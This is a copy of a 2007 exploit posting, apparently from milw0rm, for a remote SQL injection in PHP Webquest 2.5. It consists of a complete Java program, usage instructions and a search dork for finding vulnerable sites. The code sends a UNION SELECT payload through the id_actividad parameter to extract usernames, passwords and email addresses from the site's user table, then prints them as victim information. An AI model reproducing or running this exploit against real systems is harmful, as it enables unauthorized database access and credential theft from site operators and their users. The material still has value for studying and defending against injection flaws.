PHP Webquest 2.5 id_actividad Remote SQL Injection Exploit

Document Sample
PHP Webquest 2.5 id_actividad Remote SQL Injection Exploit Powered By Docstoc
					                       PHP Webquest 2.5 id_actividad Remote SQL Injection Exploit                                             Page 1/2
  1    /*
  2     * script name         : phpwebquest
  3     * script version : 2.5
  4     * script website : http://phpwebquest.org
  5     * Bug Finder       : D4real_TeaM (’unkn0wnX’,’n3t−mapper’,’ToxiC350’);
  6     * injected file    : webquest/soporte_derecha_w.php
  7     * Variable         : id_actividad
  8     * Contact          : n3t−mapp3r [At] hotmail [dot] com,is14m [At] hotmail [dot] com,ushermehdi350 [At] hotmail [dot]
       com
  9     *
  10    * Usage:
  11    *          First you must have a JDK 1.4 or more to compile the code
  12    *          Compiling: javac −nowarn −g:none SqInjection.java
  13    *          Usage: java SqInjection host_name /path/to/script/
  14    * Dork : inurl:/webquest/soporte_derecha_w.php?
  15    *
  16    * GreetZ : s4udi−s3curity−terror, Spy−Boy, R3mix−boY, Dchach−X, DiaboliC4, j4v4k, Hitch4w4, Und34d and all Moroccan,
       arab hackerS
  17    * Sp.Greetz : s0crateX ;)
  18    */
  19
  20
  21   import java.io.*;
  22   import java.net.* ;
  23   public class SqInjection {
  24
  25       public static void main(String[] argv) {
  26           Socket lhlawa;
  27           String hName,tra9,bachT3tih=" union select 1,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail) from usuario";
  28           int lmarsa=80;
  29           BufferedReader _______dakhl;PrintWriter _______kharj;
  30           if(argv.length!=2){
  31                System.out.println("Error: args not properly defined");
  32                System.exit (−1);
  33           }
  34           String zgawa[]=argv[0].split(":");
  35           if(zgawa.length==2){
  36                hName=zgawa[0];
  37                try{
  38                    lmarsa=Integer.parseInt(zgawa[1]);
  39                }catch(NumberFormatException ex){
  40                    System.out.println("Error: Invalid Port");System.exit(0);
  41                }
  42           }else{
  43                hName=argv[0];
  44           }
  45           tra9=argv[1];
  46           System.out.print("Connecing to: "+hName);
  47           try{
  48                lhlawa=new Socket(hName,lmarsa);
  49               System.out.println("\t\t[ OK ]");
  50               String in3alBoh="",taya7Jdo="GET /"+tra9+"/webquest/soporte_derecha_w.php?id_actividad=−1"+URLEncoder.encode(bachT3tih
D4real_TeaM                                                                                                                    09/14/2007
                         PHP Webquest 2.5 id_actividad Remote SQL Injection Exploit                                            Page 2/2
       )+"/* HTTP/1.1\n";
  51                  taya7Jdo+="Host: "+hName+"\n";
  52                  taya7Jdo+="Connection: Close\n\n";
  53                  _______kharj=new PrintWriter(lhlawa.getOutputStream());
  54                  _______dakhl=new BufferedReader(new InputStreamReader( lhlawa.getInputStream()));
  55                  _______kharj.print(taya7Jdo);
  56                  _______kharj.flush();
  57                  String line=_______dakhl.readLine();
  58                  if(line.equalsIgnoreCase("HTTP/1.1 200 OK")==false){
  59                      System.out.println("Error:Invalid HTTP protocol");System.exit(0);
  60                  }
  61                  boolean ok=false;
  62                  while((line=_______dakhl.readLine())!=null){
  63                      if(ok==false){
  64                          if(line.length()==0)
  65                              {ok=true;
  66                              }
  67                      }
  68                      else in3alBoh+=line+"\n";
  69                  }
  70                  _______kharj.close();
  71                  _______dakhl.close();
  72                  parseData(in3alBoh);
  73            }catch(IOException ex){
  74                  System.out.println("\nSocket Error program will exit");
  75                  System.exit(0);
  76            }
  77        }
  78        private static void parseData(String haHwaJay){
  79            String uName,passwd,mail,tmp[];
  80            tmp=haHwaJay.split("\n");
  81            for(int i=0;i<tmp.length;i++)
  82            {
  83                  if(tmp[i].trim().startsWith("<td width=\"97%\">"))
  84                  {
  85                      String safiTa7=tmp[i].trim().substring(16,tmp[i].trim().length()−4);
  86                      tmp=safiTa7.split (":");
  87                      break;
  88                  }
  89            }
  90            uName=tmp[0];passwd=tmp[1];mail=tmp[2];
  91            System.out.println("*************************** Informations about the victim ***************************");
  92            System.out.println("User Name: "+uName+"\nPassword: "+passwd+"\nVictimz mail: "+mail);
  93        }
  94   }
  95
  96   # milw0rm.com [2007−09−14]




D4real_TeaM                                                                                                                    09/14/2007